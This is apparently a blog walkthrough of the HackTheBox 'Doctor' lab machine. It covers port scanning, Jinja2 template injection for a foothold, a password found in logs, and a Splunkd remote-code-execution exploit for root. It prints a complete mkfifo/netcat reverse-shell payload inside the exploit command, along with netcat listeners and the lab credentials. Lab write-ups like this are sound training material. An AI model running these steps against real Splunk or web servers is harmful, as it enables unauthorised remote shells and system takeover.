Doctor HackTheBox Walkthrough

February 16, 2021 by Nasef


Doctor is a machine in which I used Server Side Template injection to get to obtain shell access and then used enumeration and exploit vulnerable service to get root Access.


As always, I started scanning with Nmap

nmap -sV -sV
Starting Nmap 7.80 ( ) at 2020-09-29 10:35 EDT
Nmap scan report for doctors.htb (
Host is up (0.17s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 48.74 seconds

A Normal HTTP, SSH Services and service called splunkd we will look it up later.


An Important thing to do is to add the ip and domain to /etc/hosts becuase of the host routing.       localhost       kali doctors.htb
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters


So First I tried to browse the site using the ip there is nothing important there so I got in using doctors.htb and a login page appeared!


I made an account and logged in and started making new messages. I was susspious about three things as the machine name is “Doctor”

  1. SQL Injection (Failed)
  2. XXE Injection (Vulnerable but coulding get Shell)
  3. Server Side Template Injection (Succeed)

Using the inspect element I found another directory Username

I tested the new messages both title and content. so found title is vulnerable to SSTI and visite /archive to execute. and found the code executed so it’s Server-Side Template Injection. Username


I tried to identify the template engine and it was jinja 2. So, I started listening on netcat and added the payload to title as the pervious example and executed it as I visited /archive

nc -lvnp 9999


Privilege Escalation

I ran Linpeas and found a strange thing in password in logs section


So, I tried to su shaun using this as a password and it worked! At this time, I was thinking about the usage of Splunkd so I started searching for exploits and found this one Exploit

Imeditatly I downloaded it and ran it

python --host --port 8089 --lhost --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f" --username shaun --password Guitar123
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp5iVeZF.tar
[+] Started HTTP server for remote mode
[.] Installing app from: - - [29/Sep/2020 10:56:24] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

And Started a listened in other netcat session

kali@kali:~$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 59218
/bin/sh: 0: can't access tty; job control turned off
# whoami

and voila here is the root privilege!